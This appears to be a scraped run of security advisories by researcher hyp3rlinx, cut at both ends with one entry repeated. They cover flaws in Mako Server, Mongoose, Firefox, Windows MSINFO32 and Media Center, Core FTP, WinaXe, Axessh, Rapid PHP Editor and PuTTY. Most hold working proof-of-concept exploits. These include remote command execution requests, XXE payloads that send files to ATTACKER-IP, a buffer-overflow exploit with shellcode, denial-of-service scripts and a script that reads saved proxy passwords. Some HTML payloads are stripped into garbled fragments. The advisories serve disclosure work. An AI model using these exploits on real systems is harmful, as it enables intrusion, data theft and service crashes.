curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);  
< THERE



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec


Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in Mako 
Server’s tutorial page.

The vulnerabilities found are:

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command 
Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorial may be used as the basis for production code, it is important 
for users to be aware of these issues.

“As a compact application and web server, the Mako Server helps developers 
rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and 
implement complete, custom solutions. The Mako Web Server is ideal for embedded 
Linux systems.”

Credit
An independent security researcher, John Page AKA hyp3rlinx, has reported this 
vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response

RealTimeLogic was informed of the vulnerability on Aug 13, but while 
acknowledging the receipt of the vulnerability information, refused to respond 
to the
technical claims, to give a fix timeline or coordinate an advisory, saying:

“I just sent a formal notification for the commercial license requirement and 
also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against these 
support inquiries.”

At this time it’s unclear whether these vulnerabilities are going to be fixed 
and further attempts to get a status clarification failed.


Vulnerabilities details

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command 
Execution:

Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT 
requests, when an attacker send HTTP PUT request to ‘save.lsp‘ web page, the 
input passed
to a function responsible for accessing the filesystem.

The attacker input will be saved on the victims machine and can be execute by 
sending HTTP GET request to ‘manage.lsp‘


HTTP PUT  'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET  'http://VICTIM-IP/examples/manage.lsp?execute=true=2.1=lua'


Proof of Concept


import urllib2,time

#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=

print  'MakoServer v2.5 Remote Command Execution'

CMD="os.execute('c:/Windows/system32/calc.exe')"

opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)

time.sleep(1)

urllib2.urlopen('http://IP/examples/manage.lsp?execute=true=2.1=lua')



Unauthenticated File Disclosure

Mako web-server tutorial is not sufficiently sanitizing GET requests, when an 
attacker send GET request to the URI IP/fs/../.., the input passed
without modification and the response with the file content is returned.

Proof of Concept
The following GET request will response with the C/Windows/system.ini content:

curl -v http://VICTIM-IP/fs/C/Windows/system.ini

* About to connect() to VICTIM-IP port 80
*   Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 
> OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]


Server Side Request Forgery

Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, 
when an attacker sends an POST request to the ‘rtl/appmgr/new-application.lsp‘
URI, the input will be executed and the server will connect to the attacker’s 
machine.

Proof of Concept
Start Wireshark to see successful connections made from Mako Web Server victim 
machine.

Initiate requests from another machine using CURL:

curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d 
path=http://EXTERNAL-IP



Network Access:
===
Re

CVE-2017-11567 Mongoose Web Server v6.5 CSRF Command Execution ( apparitionsec @ gmail / hyp3rlinx )

[apparitionsec]

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt
[+] ISR: apparitionSec
 


Vendor:
===
www.cesanta.com



Product:
==
Mongoose Web Server (Free Edition)
Mongoose-free-6.5.exe
Download: https://cesanta.com/binary.html


Mongoose - GitHub's most popular embedded web server
and multi-protocol networking library

Mongoose Embedded Web Server Library - Mongoose is more than an embedded 
webserver. It is a multi-protocol embedded networking library
with functions including TCP, HTTP client and server, WebSocket client and 
server, MQTT client and broker and much more.



Vulnerability Type:
===
CSRF - Command Execution



CVE Reference:
==
CVE-2017-11567



Security Issue:

Remote attackers who can lure a Mongoose web server user into clicking a 
malicious link or visit attacker controlled web page
can execute system commands on the system hosting Mongoose server. However, IF 
Mongoose web server is installed as service then
executing programs e.g. "calc.exe" may at times crash or fail to appear, but 
you may see it in Windows taskmgr.exe.
Therefore, from my tests commands may become unstable when Mongoose is run as a 
service.

When Mongoose is run standard mode attackers can potentially modify 
"Mongoose.conf" and create arbitrary files on server like .PHP etc.
to point Mongoose to this as its new "index" file. Then you need to tell 
Mongoose its "access_log_file" is the new attacker generated
file, after injecting commands into Mongoose web servers log file that will get 
excuted when log file is later requested.

This vulnerability requires CGI interpreter to be already set or some 
information about the target is known like the CGI path and language
"pl,php,cgi" used, so when we can set to use correct programming language when 
file is created during initial CRSF attack.

Note: If running commands with arguments, we have to use "\t" tab chars as 
using space will break our TELNET based code injection
to the server log.

e.g.

GET HTTP/1.1

OR just TELNET to Mongoose web server, inject arbitrary commands, then call 
exec by making another TELNET HTTP GET.


After Command Injection "Mongoose.conf" will be:

# Mongoose web server configuration file.
# For detailed description of every option, visit
# https://github.com/cesanta/Mongoose
# Lines starting with '#' and empty lines are ignored.
# To make a change, remove leading '#', modify option's value,
# save this file and then restart Mongoose.

# access_control_list 
access_log_file C:\Mongoose.access.php <=== BOOM
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe <== MUST BE SET
# cgi_pattern **.cgi$|**.pl$|**.php$
# dav_auth_file 
# dav_root 
# debug 0
document_root C:\
# enable_directory_listing yes
# error_log_file 
# extra_headers 
# extra_mime_types 
# global_auth_file 
# hide_files_patterns 
# hexdump_file 
index_files Mongoose.access.php   < BOOM
# listening_port 8080
# run_as_user 
# ssi_pattern **.shtml$|**.shtm$
# ssl_certificate 
# ssl_ca_certificate 
# start_browser yes
# url_rewrites



Mongoose log file Command Inject to create backdoor.
---

2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:30 - 127.0.0.1 - GET 400 0 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 
4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET 
/__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -
 

Tested Windows 7.



Exploit/POC:
=

1) add backdoor account POC.

http://127.0.0.1:8080/__mg_admin?save; method="post">




document.forms[0].submit()



2) TELNET x.x.x.x 8080
GET HTTP/1.1

Enter

Enter

TELNET x.x.x.x 8080
GET / HTTP/1.1

Enter

Enter

Done, backdoor added!




1) run calc.exe POC.

http://127.0.0.1:8080/__mg_admin?save; method="post">



document.forms[0].submit()


2) TELNET x.x.x.x 8080
GET / HTTP/1.1

Enter

Enter



Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: July 23, 2017
Vendor Notification: July 28, 2017
Vendor Acknowledgement: July 31, 2017
Vendor Fixed released version  6.9 : September 4, 2017
September 4, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" wi

Firefox v54.0.1 Denial Of Service

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.mozilla.org



Product:
===
Firefox v54.0.1



Vulnerability Type:
===
Denial Of Service



Security Issue:

Dynamically creating HTML elements IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA 
and assigning very long string of junk chars to the
"style.color" property results in Firefox Browser out of memory crash (not tab 
crash).

Tested on Windows 7

References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288


Exploit/POC:
=




var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}
var el = document.createElement('img')  //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA 
 //<=== OR any of these elements.
el.style.color=p2
document.body.appendChild(el)
  






Network Access:
===
Remote



Severity:
=
Medium




Disclosure Timeline:
=
Vendor Notification: June 27, 2017
July 7, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Symantec VIP Access Desktop Arbitrary DLL Execution

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-VIP-ACCESS-ARBITRARY-DLL-EXECUTION.txt

[+] ISR: ApparitionSec



Vendor:

www.symantec.com



Product:
===
Symantec VIP Access
Desktop versions prior to 2.2.2


Vulnerability Type:
===
Arbitrary DLL Execution



CVE Reference:
==
CVE-2016-6593



Vulnerability Details:
=

VIP Access Desktop UI Manager invokes DLLs from the current working folder 
during startup. A malicious local user can create
specifically modified DLLs to replace the normal product DLLs required during 
startup.

Then, by redirecting the startup path of the VIP Access Desktop UI Manager the 
user can cause the VIP Access Desktop
UI Manager to invoke the substituted DLL instead of the required product DLL. 
Any specifically modified code execution
could be performed with logged-on user privileges, which is normally user-level 
access in currently supported operating systems.
Ultimately, this problem is caused by a failure to properly validate required 
product DLLs during start-up.

This could result in a local user being able to manipulate VIP Access Desktop 
to load and execute an arbitrary DLL of the user’s
choice with user-level privileges.

Reference:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20161208_00



Disclosure Timeline:
==
Vendor Notification:  February 4, 2016
December 8, 2016  : Public Disclosure




Exploitation Technique:
===
Local




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Microsoft MSINFO32.EXE ".NFO" Files XML External Entity

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt

[+] ISR: ApparitionSec



Vendor:
=
www.microsoft.com



Product:
==
Windows System Information
MSINFO32.exe v6.1.7601


Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system 
components, and software environment.

Parameters
FileName   : Specifies the file to be opened. This can be an .nfo, .xml, .txt, 
or .cab file.



Vulnerability Type:
===
XML External Entity



CVE Reference:
==
N/A



Vulnerability Details:
=

Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack 
which can potentially allow remote attackers to 
gain access to and exfiltrate files from the victims computer if they open a 
malicious ".nfo" file via remote share / USB etc.

Upon open the file user will see error message like "System Information is 
unable to open this .nfo file. The file might
be corrupt etc..


Tested Windows 7 SP1


Exploit code(s):
===

Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
This file contains credentials for MS ADO Remote Data Services.


1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)



2) "payload.dtd"



http://attacker-ip:8080?%file;'>">

%all;



3) "FindMeThatBiatch.nfo" (corrupt .NFO file)



http://attacker-ip:8080/payload.dtd;>
%dtd;]>




Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32 opens... 
attacker gets files.

OR open via Windows CL:
c:\>msinfo32  \\REMOTE-SHARE\FindMeThatBiatch.nfo



Disclosure Timeline:
==
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Microsoft Windows Media Center "ehshell.exe" XML External Entity

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt

[+] ISR: ApparitionSec



Vendor:
==
www.microsoft.com



Product:
==
Windows Media Center "ehshell.exe"
version 6.1.7600



Vulnerability Type:

XML External Entity 



CVE Reference:
==
N/A



Vulnerability Details:
=

Windows Media Center "ehshell.exe" is vulnerable to XML External Entity attack 
allowing remote access to ANY files on a victims computer, if they open
an XXE laden ".mcl" file via a remote share / USB or from an malicious 
"windowsmediacenterweb" web link.

Sometimes 'Windows Media Center' will crash, sometimes opens normally and other 
times will not open, but the files get accessed and exfiltrated.


Tested Windows 7 SP1



Exploit code(s):
===

POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services.


1) ATTACKER-IP listener  
python -m SimpleHTTPServer 8080



2) Create the "FindMeThatBiotch.dtd" DTD file with below contents (host on 
ATTACKER-IP in directory where python server is listen)

http://ATTACKER-IP:8080/%data666;'>">



3) Create the "EVIL.mcl" file.




http://ATTACKER-IP:8080/FindMeThatBiotch.dtd;>
%junk;
%param666;
%FindMeThatBiotch;
]>



4) Get victim to open the EVIL.mcl ... enjoy your files!

OR create link on webpage to run the file, but "user has to consent first".

XXE POC



Disclosure Timeline:
===
Vendor Notification:  September 1, 2016
Vendor opens Case 34970: September 6, 2016
Vendor reply "Wont Fix" : October 19, 2016
December 4, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Core FTP LE v2.2 Remote SSH/SFTP Buffer Overflow

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===
www.coreftp.com



Product:

Core FTP LE (client)
v2.2 build 1883 

Core FTP LE - free Windows software that includes the client FTP features you 
need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and drop 
support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and much, 
much more.



Vulnerability Type:

Remote SSH/SFTP Buffer Overflow 



CVE Reference:
==
N/A



Vulnerability Details:
=

Core FTP client is vulnerable to remote buffer overflow denial of service when 
connecting to a malicious server using
SSH/SFTP protocol.

Upon receiving an overly long string of junk from the malicious FTP server 
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can be 
seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c005 (first/second chance not available)
eax=035b ebx=4141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12mov edx,dword ptr [edx]  ds:002b:41414141=




Exploit code(s):
===

import socket

print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'

port = 22  
s = socket.socket()

payload="A"*77500
s.bind((host, port))
s.listen(5)
 
print 'Listening on port... %i' %port
print 'Connect to me!'
 
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
conn.close()



Exploitation Technique:
===
Remote



Severity Level:
===
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Putty Cleartext Password Storage

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUTTY.EXE-INSECURE-PASSWORD-STORAGE.txt

[+] ISR: ApparitionSec



Vendor:
==
www.chiark.greenend.org.uk



Product:
===
Putty.exe
v0.67

PuTTY is a free and open-source terminal emulator, serial console and network 
file transfer application. It supports several
network protocols, including SCP, SSH, Telnet, rlogin, and raw socket 
connection.



Vulnerability Type:
==
Cleartext Password Storage



Vulnerability Details:
=

Putty.exe stores Passwords unencrypted for sessions that use a Proxy connection 
and specify a password to save.

Putty saves sessions in Windows registry and passwords are stored in cleartext. 
By storing the passwords in the clear
it can put the Proxy server at risk if the system running Putty is compromised.

A casual Putty user may not be aware of how and where passwords are stored, 
they may assume saving passwords are safe.
As Putty does NOT warn the user to the fact that when saving Proxy passwords 
they are stored in cleartext in the registry.


1) Create and save a Putty session specifying a Proxy for the connection, enter 
a password and save it.


2) Run the below 'Putty-Insecure-PWD.bat' script to search registry for saved 
session passwords. 


"Putty-Insecure-PWD.bat"
---

@echo off

setlocal ENABLEEXTENSIONS
set /p v1=Enter Putty Saved Session: %1

echo Search registry for %v1% session Putty password?

pause

set KEY_NAME=HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\%v1%
set VALUE_NAME=ProxyPassword

FOR /F "tokens=1-3" %%A IN ('REG QUERY %KEY_NAME% /v %VALUE_NAME% 2^>nul') DO (
set ValueName=%%A
set ValueType=%%B
set ValueValue=%%C
)

if defined ValueName (
@echo Value Name = %ValueName%
@echo Value Type = %ValueType%
@echo Value Password = %ValueValue%

) else (
@echo %KEY_NAME%\%VALUE_NAME% not found.
)

set "v1="


End BAT script/

e.g. output when run BAT file:

Value Name = ProxyPassword
Value Type = REG_SZ
Value Password = abc123

OR manually open regedit and ctrl+F to find 'SimonTatham' then find your 
session Key you saved.

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\

Next, find String Name 'ProxyPassword' and double click to open

value name:
ProxyPassword

Value data:




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

WinaXe v7.7 FTP 'Server Ready' CMD Remote Buffer Overflow

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt

[+] ISR: Apparition Security



Vendor:

www.labf.com



Product:

WinaXe v7.7 FTP 

The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built 
and provided in the package.
All that you need to run remote UNIX and X Applications is included within 
WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.



Vulnerability Type:
===
Remote Buffer Overflow



Vulnerability Details:
==

WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors 
when connecting to a malicious FTP Server and
receiving overly long payloads in the command response from the remote server.

220 SERVICE READY 
331 USER / PASS
200 TYPE
257 PWD

etc...

below is POC for "server ready" 220 command exploit when first connecting to a 
FTP server.


Exploit code(s):
===

import socket,struct

#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


eip=struct.pack('<L',0x68084A6F)#POP ECX RET 
jmpesp=struct.pack('<L',0x68017296) #JMP ESP

#We will do POP ECX RET and place a JMP ESP address at the RET address that 
will jump to shellcode.

payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' 
Exploit

port = 21   
s = socket.socket()
host = '127.0.0.1'  
s.bind((host, port))
s.listen(5)

print 'Evil FTPServer listening...'

while True:
conn, addr = s.accept() 
conn.send('220'+payload+'\r\n')
conn.close()





Exploitation Technique:
===
Remote



Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Axessh 4.2.2 Denial Of Service

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:

www.labf.com



Product:
=
Axessh 4.2.2

Axessh is a SSH client. It is a superb terminal emulator/telnet client for 
Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been 
developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own 
cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, 
AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection 
forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested 
port forwarding 



Vulnerability Type:

Denial Of Service

AxeSSH will crash after receiving a overly long payload of junk...



Exploit code(s):
===

1) Open the settings window for axessh and choose Run then click Run as EXE, 
this will launch "xwpsshd.exe"
crashes with bad protocol version.


import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Rapid PHP Editor CSRF Remote Command Execution

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt

[+] ISR: Apparition Security



Vendor:
==
www.rapidphpeditor.com



Product:
===
Rapid PHP Editor IDE
rapidphp2016.exe v14.1


Rapid PHP editor is a faster and more powerful PHP editor for Windows combining 
features of a fully-packed PHP IDE with 
the speed of the Notepad. Rapid PHP is the most complete all-in-one software 
for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating, reusing, 
navigating and formatting your code.



Vulnerability Type:
=
CSRF Remote Command Execution



CVE Reference:
==
N/A



Vulnerability Details:
=

There is a Remote Command Execution ailment in this IDE, if a user of this IDE 
is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious 
webpage then remote attackers can execute arbitrary
commands on the victims system.

Reference:
http://forums.blumentals.net/viewtopic.php?f=15=7062


Exploit code(s):


Call Windows "calc.exe" as POC

http://127.0.0.1:89/~C/Windows/system32/calc.exe;>Click it!

OR

http://127.0.0.1:89/~C/Windows/system32/calc.exe; method="post">
document.forms[0].submit()




Disclosure Timeline:
=
Vendor notification:  October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure




Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Axessh 4.2.2 Denial Of Service

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:

www.labf.com



Product:
=
Axessh 4.2.2

Axessh is a SSH client. It is a superb terminal emulator/telnet client for 
Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been 
developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own 
cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
